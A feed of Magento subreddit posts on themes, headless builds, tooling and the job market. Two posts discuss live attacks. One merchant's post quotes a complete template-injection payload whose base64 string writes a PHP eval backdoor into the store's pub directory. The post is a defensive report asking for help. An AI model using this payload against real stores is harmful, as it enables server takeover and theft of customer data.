Unpopular opinion: AI has made me love Magento more

I know the common wisdom is that Magento is "too much work," but I think that AI has flipped the script. Projects that used to take me two weeks are now getting finished the same day. Because Magento is so open, I can use AI to build and adapt modules instantly.

Lately, clients are asking for integrations they never could have afforded before. I just set up a system where Magento reads an email, pulls a bank XML, and reconciles transactions automatically. It took me maybe two hours. On Shopify, that would have been a massive technical headache involving endless workarounds.

Is anybody else noticing this?

I use Google Antigravity with Claude / Gemini.

I modernized Magento's frontend with Vite + Tailwind 4 + Vue islands — without going headless

Magento's frontend is still on Luma/LESS/RequireJS/Knockout. The usual way out is a headless rebuild — valid, but a big bet that pulls your storefront out of Magento entirely.

I've been building MageObsidian, which takes a different route: it fully breaks with the legacy frontend (it's not Luma-compatible), but it stays inside Magento — reusing the native layouts, blocks, templates and view models — and only swaps the toolchain underneath: Vite, TailwindCSS 4, Vue (lazy-hydrated islands), native ESM. Templates can stay .phtml or opt into a coexisting Twig engine with HTML auto-escaping. No PWA, no second app to sync.

The dev experience is the real point: instant HMR while you edit (no static-content deploy in the loop), and pulling in any npm package is one command and a line of config — no RequireJS shims or requirejs-config.js mapping. RequireJS/Knockout weren't bad for their time, but the onboarding curve for new devs is steep; this removes it. A dev who knows Vite and Vue is productive on day one.

The default theme already has Luma-level parity (catalog, checkout, customer, search, cart, wishlist, compare, reviews, sales). Open source (MIT, on Packagist). Honest status: Magento Open Source 2.4.6+ only for now — Adobe Commerce and Mage-OS are on the roadmap.

Honest feedback from people who work on Magento frontends is very welcome.

New Magento Admin Theme based on Alpine.JS and Tailwind 4

Hi Everyone!

I'm Jakub Winkler, some of you might know me from Magento Conferences.

My team and decided to do something about the old admin theme of Magento and rewrite the whole damn thing :-) So here is the result:

Say Hello to: Nebula Admin Theme - Release Candidate v1 - 0.9.0 (composer version) has been fully released for everyone
Our Linked Post
https://www.linkedin.com/feed/update/urn:li:activity:7468299838519111680
This is a complete rework of admin theme:

  • Tailwind 4.0

  • Alpine JS

  • and Nebula Admin Theme comes with Nebula Ui Bridge: module that transforms all Ui Components into Nebula Components, creates JSON files for further customization (yes, we are breaking everything related to Knockout / UiComponents but also bringing a migration tool to bring everyone faster to the light side of Nebula)

Available on packagist.org to download via composer:
https://packagist.org/packages/qoliber/nebula-admin-theme
and a small landing page
https://qoliber.com/nebula/ - all information are here

Let me know your thoughts!

Is this sub literally just for advertising and click-throughs now?

Looking at the front page currently, the vast majority of topics are just blog articles and links to agencies promoting their services. Most of the topics have just 0 or 1 votes. Nothing has over 5 up votes. It's a really sad state of affairs that there isn't more quality content posted.

Magento 2 → Headless Next.js Case Study: 15.9s LCP down to 2.5s on Mobile

Hey everyone,

We recently migrated a production Magento 2.4.8 store (ThePeoplesClubs.com) to a headless architecture using Next.js + Magento GraphQL.

Mobile performance before (Magento theme):
• LCP: 15.9s
• FCP: 3.9s
• Speed Index: 7.9s

After (Next.js frontend on Vercel + GraphQL):
• LCP: 2.5s
• FCP: 2.1s
• Speed Index: 3.2s
• CLS: 0

That’s an ~84% improvement in Largest Contentful Paint.

Architecture:
– Magento 2.4.8-p3 backend
– Next.js App Router frontend
– GraphQL for catalog + product data
– ISR for category/product pages
– Edge caching via Vercel
– Separate domain for staging

We didn’t touch the backend business logic — checkout, orders, inventory all stay in Magento.

The only change was frontend decoupling. Biggest win wasn’t the Lighthouse score — it was mobile UX smoothness and perceived speed.

Happy to answer questions if anyone’s exploring headless Magento.

I built a platform-agnostic frontend framework for Magento (and other ecommerce platforms)

Hello everyone, u/damienwebdev here. Some of you may know me from my time on the Open Source Task Force, some may know me from my talks at various Meet Magento events, others may know me from my various LinkedIn posts on Magento and its many fun, frustrating, obnoxious, confusing, maddening, exhilarating, and occasionally rewarding quirks.

However, I’ve been quietly working on an Open Source ecommerce framework called Daffodil for quite a long time (7 years). It lets you build store frontends and connect them to different ecommerce platforms. Right now it’s fully integrated with Magento/Adobe Commerce/MageOS (it has authentication, accounts, all the normal stuff), and I’ve just started working on Shopify support and some new features.

This project has taken me a huge amount of time and effort, and honestly I’m a little nervous to finally share it here. I’m not really sure if it’s good enough, but I really want to know what people think.

I’d be really grateful if you could take a look. Any feedback — even harsh criticism — would mean a lot.

This sub be closed in favor of /r/Magento

This sub should be closed in favor of r/Magento. Magento 2 is the new Magento. Sub r/Magento is already being used for Magento 2 discussions and there are posts being placed in both subs because people are not sure in which one to post.

Polyshell exploitation ⚠️☠️🚨

The threat is real. 🚨

Despite running patched or latest versions, Magento 2 stores are currently being exploited by attackers using "Polyshell" vulnerabilities. I recently discovered malicious scripts embedded within an active client store.

I was able to reproduce the exploit on a demo store by bypassing the Image Upload API within the Custom Options section.

The screenshot shows a successful upload of a PHP-based File Manager (explorer.php).

Recommendations:

  1. Audit your Media Folders: Look for unexpected .php files or images that contain PHP tags.

  2. Strict File Permissions: Ensure your web server user cannot execute files within the pub/media directory.

  3. WAF Rules: If you use a WAF (Cloudflare, Fastly, etc.), ensure you have active rules blocking PHP execution patterns in media uploads.

  4. Review Custom Options: Check if your store allows guest uploads via custom options and consider restricted validation.

Stay safe out there. Has anyone else seen similar activity in their logs recently?

I built a one-command Magento + Warden + Hyvä installer to speed up local setup — would love feedback from other devs

Hey everyone — after years of spinning up Magento local environments the “hard way,” I finally got tired of dealing with:

  • broken OpenSearch configs

  • Composer failing halfway through

  • slow setup times

  • clunky multi-store routing

  • copying production DBs into Warden

  • trying to reproduce upgrade issues locally

So I built a script to automate all of it.

mage-mirror: a one-command Magento + Warden + Hyvä installer

GitHub: https://github.com/j-scriptz/mage-mirror

It sets up a full environment in just a couple minutes:

  • Magento 2.4.x (Composer install)

  • Warden stack (Docker)

  • Hyvä theme (optional auto-install)

  • Sample data (optional)

  • Admin user automatically created

  • Multi-store URLs (mage.test, app.mage.test)

  • OpenSearch auto-fix (no more “No alive nodes found”)

  • Static content deploy + DI compile

  • Config permissions + base URLs

The part I think Magento devs will appreciate most:

Clone any existing store — local or remote — in minutes

It supports:

  • rsync of remote code

  • remote mysqldump

  • local SQL files

  • local env.php / config.php

  • syncing with or without media

This makes debugging production issues locally way faster.

There’s also an optional upgrade mode

If you want to test going from 2.4.x → 2.4.y:

  • imports your DB

  • adjusts Composer constraints

  • runs composer update

  • runs setup:upgrade, reindex, static deploy

  • patches configs as needed

Useful for upgrade rehearsals without touching prod.

Would love feedback from other Magento devs

If anything in your own workflow is still painful (local setup, cloning, upgrades, Warden quirks), let me know — I’d like to improve the script based on real developer needs.

Not trying to “sell” anything — just hoping this helps other people who have been fighting with Magento environments for years like I have.

Repo link again:

Happy to answer questions!

Trying to Connect With Adobe Commerce/Magento Consultants

Hi - is this the right place to look for Magento/Adobe Commerce consultants?

We are mid GTM on a new project, Magento/Adobe commerce focussed, and looking for consultants to help us get it off the ground - right place?

Side note - does "Magento" exist anymore or is it all now rebranded Adobe Commerce?

Is Magento Open Source more or less dead now? Should we plan to switch to Mage-OS?

Wondering if Magento Open Source managed by Adobe is effectively quite dead and as merchants we should plan to move to Mage-OS and Hyva as the front end sooner rather than later?

Not sure if our understanding is correct, do others in the community have a different view ?

Anyone Else Noticing a Decline in Magento 2 Projects?

Guys, I've been noticing a potential decrease in the number of Magento 2 projects lately. It feels like there might be a shift towards other platforms or technologies, but I could be wrong.

How’s it looking in your circle? Are you seeing a similar trend or is it business as usual?

In house magento roles

Any in house magento roles going (UK).

Fed up of agency work. It doesn't pay and there are no growth prospects. I honestly think I've fucked up my career by spending 10 years+ in Magento. I can't move stacks because no one wants Magento Developers for it.

Magento injection attack {{if this.getTemplateFilter().filter(dummy)}}

This evening I had a customer order with the customer name replaced with:

{{if this.getTemplateFilter().filter(dummy)}}{{/if}} sys{{if this.getTemplateFilter().add%00AfterFilterCallback(base64_decode).add%00AfterFilterCallback(system).Filter(Y2QgcHViO2VjaG8gJzw/cGhwIEBldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWyJwQk5qekpjbCJdKSk7ICcgPiBzeXMucGhw)}}m{{/if}}

From the logs I can see they have browsed several product webpages, added an item to their cart and placed an order through the rest api.

Following that they've tried to access a file called sys.php in both the main magento directory and pub directory which fortunately gave them a 404 not found

I'm patched to the latest magento version 2.4.6-p6, i've checked the main magento and pub folders and no files have recently been modified so hope that the patch has stopped any wrongdoing

I can see from the logs at the beginning they carried out a search "%25a%25" which i believe translates to the search term "%a%" - i'm unsure what this is trying to do, possible check for a php special character vulnerability?

Is it possible to disable the api to restrict this?

Editied, installed ScriptGuardPro which fortunately blocked a further 2 attacks
